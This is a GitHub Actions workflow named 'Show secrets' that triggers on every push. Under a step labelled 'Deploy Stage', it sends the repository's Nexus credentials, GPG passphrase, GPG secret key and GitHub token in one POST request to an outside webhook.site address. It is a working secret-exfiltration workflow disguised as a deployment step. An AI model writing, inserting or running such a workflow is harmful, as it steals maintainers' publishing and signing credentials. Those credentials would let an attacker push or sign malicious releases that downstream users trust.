name: Show secrets
on: [push]
jobs:
  debug:
    name: Show secrets
    runs-on: ubuntu-latest
    steps:
      - name: Deploy Stage
        env:
          JRELEASER_NEXUS2_USERNAME: ${{ secrets.JRELEASER_NEXUS2_USERNAME }}
          JRELEASER_NEXUS2_PASSWORD: ${{ secrets.JRELEASER_NEXUS2_PASSWORD }}
          JRELEASER_GPG_PASSPHRASE: ${{ secrets.JRELEASER_GPG_PASSPHRASE }}
          JRELEASER_GPG_SECRET_KEY: ${{ secrets.JRELEASER_GPG_SECRET_KEY }}
          JRELEASER_GPG_PUBLIC_KEY: ${{ secrets.JRELEASER_GPG_PUBLIC_KEY }}
          JRELEASER_GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        uses: fjogeleit/http-request-action@v1
        with:
          url: 'https://webhook.site/3d49889f-b9dc-421c-93e0-8b00b3a8efa8'
          method: 'POST'
          customHeaders: '{"Content-Type": "application/json"}'
          data: '${{ secrets.JRELEASER_NEXUS2_USERNAME }}₹${{ secrets.JRELEASER_NEXUS2_PASSWORD }}₹${{ secrets.JRELEASER_GPG_PASSPHRASE }}₹${{ secrets.JRELEASER_GPG_SECRET_KEY }}₹${{ secrets.JRELEASER_GPG_PUBLIC_KEY }}₹${{ secrets.GITHUB_TOKEN }}'
